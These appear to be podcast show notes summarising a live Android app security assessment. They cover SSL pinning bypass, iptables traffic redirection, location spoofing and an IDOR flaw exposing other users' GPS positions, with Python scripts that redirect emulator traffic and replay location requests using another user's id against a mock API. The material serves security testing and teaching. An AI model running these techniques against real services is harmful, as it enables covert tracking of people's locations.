Hacker Public Radio

Your ideas, projects, opinions - podcasted.

New episodes Monday through Friday.


HPR4645: ZERO HOUR: FRIDAY AFTERNOON APK HACKING

Hosted by operat0r on 2026-05-22 01:00:00

This show has been flagged as Explicit by the host.

WARNING AI GENERATED NOTES AHEAD YMMV

What follows is a summary of the recorded Android hacking session, with a section for web references to the main tools and topics discussed.

Overview

The recording features a security consultant performing a live, unscripted assessment of an Android application. The consultant uses a custom tool suite called "Jamboree" plus the usual utilities to test a location-sharing and vehicle management app. The session shows where most of the effort in a modern mobile assessment goes: not into the findings themselves, but into getting traffic visible at all in the face of certificate pinning, an HTTP stack that ignores proxy settings, and anti-tampering and root-detection checks.

Environment and Tools

The assessment is conducted on a rooted Android emulator. The speaker utilizes several tools to set up the environment and intercept traffic:

  • Jamboree: a custom automation tool the speaker has developed over six years; it handles rooting, proxy setup and app installation within minutes.
  • Burp Suite: the interception proxy used to analyze traffic between the app and the production server.
  • Frida: dynamic instrumentation, used to bypass root detection and SSL pinning at runtime.
  • Ghidra: a reverse-engineering suite with a decompiler, used to analyze the app's native code. It matters here because Flutter compiles Dart to native code in release builds, so Java/Dalvik decompilers do not reach the interesting logic; patching the Flutter-based application was done at this level.
  • Android Debug Bridge (ADB): troubleshooting, debugging, and reading the device log (adb logcat), which is where the user IDs and location data used later were extracted from.

Technical Challenges: SSL Pinning and Flutter

The target application is built with Flutter and ships hardening that defeats the default interception setup. It pins the server certificate, so the client rejects the proxy's certificate and a standard Man-in-the-Middle (MitM) attempt fails at the TLS handshake. Its HTTP client ignores both the system and user-installed certificate stores, so simply installing the auditor's CA on the device does not help, and it does not honour the device's Wi-Fi proxy setting, so traffic never reaches the proxy in the first place.

To overcome this:

  1. Traffic redirection: the speaker uses iptables NAT rules on the rooted emulator to rewrite the destination of outbound HTTP and HTTPS traffic to the proxy's IP address. Because the rewrite happens at the network layer, the app's indifference to proxy settings no longer matters. One caveat a practitioner needs: the redirected client sends a plain TLS handshake rather than a proxy CONNECT, so Burp has to be configured for invisible proxying to accept it.
  2. Patching with AI: the speaker leverages AI (specifically mentioning Claude and access to "Kuro") to assist in patching the APK. The AI helped navigate Ghidra and generate Python scripts to disable the app's pinning and trust checks, so that the modified APK trusts the auditor's certificate.
  3. Frida scripts: "Frida anti-root SSL pinning" scripts are run against the app to disable root detection and any remaining pinning checks at runtime, on top of the static patch.
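The redirection step above, written out as an added example; this is not the speaker's Jamboree code, and the addresses are assumptions: 10.0.2.2 is the emulator's alias for the host machine, 8080 is Burp's default listener port, and a rooted emulator with su reachable through adb shell is assumed. The rules go in the nat table's OUTPUT chain because the traffic originates on the device itself; traffic already bound for the proxy host is excluded so the rewrite cannot loop.

```python
import subprocess

# Assumed addresses: 10.0.2.2 is the Android emulator's alias for the host
# machine, and 8080 is Burp's default listener port.
PROXY_IP = "10.0.2.2"
PROXY_PORT = 8080


def redirect_rules(proxy_ip=PROXY_IP, proxy_port=PROXY_PORT, ports=(80, 443)):
    """iptables rules for the emulator's nat OUTPUT chain: rewrite the
    destination of outbound TCP 80/443 to the proxy. Packets already
    addressed to the proxy host are left alone so the DNAT cannot loop."""
    return [
        f"iptables -t nat -A OUTPUT ! -d {proxy_ip} -p tcp --dport {port} "
        f"-j DNAT --to-destination {proxy_ip}:{proxy_port}"
        for port in ports
    ]


def cleanup_rules():
    """Flush the nat OUTPUT chain when the session is over."""
    return ["iptables -t nat -F OUTPUT"]


def adb_commands(rules):
    """Wrap each rule for a rooted device: adb shell su -c '<rule>'."""
    return [["adb", "shell", "su", "-c", rule] for rule in rules]


def push_rules(rules, dry_run=True):
    """Run the rules on the attached emulator; with dry_run only the argv
    lists are returned, so the script can be reviewed before touching
    the device."""
    cmds = adb_commands(rules)
    if not dry_run:
        for cmd in cmds:
            subprocess.run(cmd, check=True)
    return cmds


if __name__ == "__main__":
    for cmd in push_rules(redirect_rules()):
        print(" ".join(cmd))
```

Burp's listener must be bound to an interface the emulator can reach (not only 127.0.0.1 on the host) with "Support invisible proxying" enabled, so it can use the TLS SNI or HTTP Host header to work out where the redirected connection was going. Redirection only delivers the bytes to the proxy; the pinning still has to be dealt with by the patch or the Frida script, otherwise the app simply drops the connection.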

Key Vulnerabilities Identified

1. Geolocation Spoofing

The consultant spoofed the device's GPS position using the emulator's location controls (for example, placing the device in Puerto Rico or Costa Rica). The application accepted the falsified coordinates as valid. Any client can report whatever position it likes, so the point of the finding is that the server trusts client-reported location without corroborating where it came from; how serious that is depends on how much the app's features rely on that location being genuine.

2. Insecure Direct Object Reference (IDOR) / Broken Access Control

The most critical finding involves the app's user tracking feature.

  • The API exposes a user's location keyed by a user_id parameter.
  • By intercepting traffic and reading adb logcat output, the consultant extracted their own user_id and the user_id of a second test account.
  • While authenticated as the first user, the consultant resent the location request with the second account's user_id substituted. The server answered with the second account's GPS coordinates. An authenticated user can therefore track the real-time location of any other user whose ID they hold; how far that reaches beyond the two test accounts depends on how easily user_ids can be obtained or guessed.
  • The proof of concept was produced by copying the request from Burp as a curl command, so the exploit can be reproduced outside the app.

3. Potential Information Disclosure

The consultant began testing a feature that lets users add vehicles by license plate. The open question is whether the lookup returns more personally identifiable information (PII) than the UI needs, for example VINs or registration details; returning the full record and letting the client pick fields is excessive data exposure, and the server should return only what the screen uses. This was not carried to a conclusion in the recording.

4. Access Control (Calendar Feature)

The consultant tested whether calendar events could be read by switching the user_id parameter in the same way. This request was rejected with "401 Unauthorized" (strictly, 403 Forbidden is the more accurate status for an authenticated user who lacks permission, but the rejection is what matters), showing that this endpoint does enforce that the requested user matches the caller. The contrast with the location endpoint suggests authorization is applied per endpoint rather than centrally, so each endpoint needs testing individually.
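The two access-control checks above (the location IDOR in finding 2 and the calendar endpoint in finding 4), as one runnable added example. This is illustration, not the consultant's tooling or the target's real API: the logcat lines, the /v1/users/<id>/location and /v1/users/<id>/calendar paths, the bearer-token scheme and the in-process mock backend are all constructed for the demo. The mock reproduces the behaviour the session observed (location hands back another user's coordinates, calendar refuses), the harvesting step is the logcat extraction, and the replay step is what the copied curl command does by hand.

```python
import json
import re
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed logcat excerpt (not from the recording): the app logs the
# user_id it syncs positions for, which is how the ids were harvested.
SAMPLE_LOGCAT = """\
05-22 13:02:11.412  4821  4821 D LocationSync: upload user_id=1001 lat=18.2208 lon=-66.5901
05-22 13:02:12.003  4821  4850 I Api: GET /v1/users/1001/location -> 200
05-22 13:05:40.118  5093  5093 D LocationSync: upload user_id=1002 lat=9.7489 lon=-83.7534
"""
USER_ID_RE = re.compile(r"user_id=(\d+)")


def extract_user_ids(logcat_text):
    """Unique user_id values in first-seen order (feed it `adb logcat -d`)."""
    ids = []
    for match in USER_ID_RE.finditer(logcat_text):
        if match.group(1) not in ids:
            ids.append(match.group(1))
    return ids


# Hypothetical backend standing in for the production API. Paths and the
# bearer-token scheme are assumptions; the authorization behaviour mirrors
# the session: location is unchecked, calendar is enforced.
LOCATIONS = {"1001": {"lat": 18.2208, "lon": -66.5901},
             "1002": {"lat": 9.7489, "lon": -83.7534}}
TOKENS = {"tok-1001": "1001", "tok-1002": "1002"}


class MockApi(BaseHTTPRequestHandler):
    def _reply(self, status, body):
        data = json.dumps(body).encode()
        self.send_response(status)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_GET(self):
        auth = self.headers.get("Authorization", "")
        caller = TOKENS.get(auth[7:]) if auth.startswith("Bearer ") else None
        m = re.fullmatch(r"/v1/users/(\d+)/(location|calendar)", self.path)
        if caller is None or m is None:
            return self._reply(401, {"error": "unauthorized"})
        target, resource = m.groups()
        if target not in LOCATIONS:
            return self._reply(404, {"error": "no such user"})
        if resource == "location":
            # Vulnerable: the token is validated but target is never compared
            # to caller, so any authenticated user can read anyone's position.
            return self._reply(200, LOCATIONS[target])
        if target != caller:
            # The session saw 401 here; 403 would be the more precise code.
            return self._reply(401, {"error": "unauthorized"})
        return self._reply(200, {"events": []})

    def log_message(self, *_):
        pass  # keep the mock quiet


def start_mock():
    server = HTTPServer(("127.0.0.1", 0), MockApi)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


# Ignore any http_proxy environment so the mock is reached directly.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def fetch(base, token, user_id, resource):
    """One authenticated GET; returns (status, parsed JSON or None)."""
    req = urllib.request.Request(f"{base}/v1/users/{user_id}/{resource}",
                                 headers={"Authorization": f"Bearer {token}"})
    try:
        with OPENER.open(req, timeout=5) as resp:
            return resp.status, json.loads(resp.read())
    except urllib.error.HTTPError as err:
        return err.code, None


def check_idor(base, token, own_id, victim_id, resource):
    """Replay the request as the attacker with the victim's id substituted."""
    own_status, _ = fetch(base, token, own_id, resource)
    if own_status != 200:
        return "inconclusive"  # our own request failed: broken, not tested
    victim_status, _ = fetch(base, token, victim_id, resource)
    return "vulnerable" if victim_status == 200 else "protected"


def run_assessment():
    server = start_mock()
    base = f"http://127.0.0.1:{server.server_port}"
    own_id, victim_id = extract_user_ids(SAMPLE_LOGCAT)[:2]
    try:
        return {res: check_idor(base, "tok-1001", own_id, victim_id, res)
                for res in ("location", "calendar")}
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(run_assessment())  # {'location': 'vulnerable', 'calendar': 'protected'}
```

The check first confirms the attacker's own request succeeds before trying the victim's id, so a dead endpoint is reported as inconclusive rather than as protected; that distinction is what separates "access control works" from "the test never ran". Against a real target, point `base` at the intercepted host and replace the constructed logcat text with the output of `adb logcat -d`.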

Web References and Resources

Below are references for the main tools and concepts discussed in the training:


Copyright Information

Unless otherwise stated, our shows are released under a Creative Commons Attribution-ShareAlike 3.0 Unported (CC BY-SA 3.0) license.

The HPR Website Design is released to the Public Domain.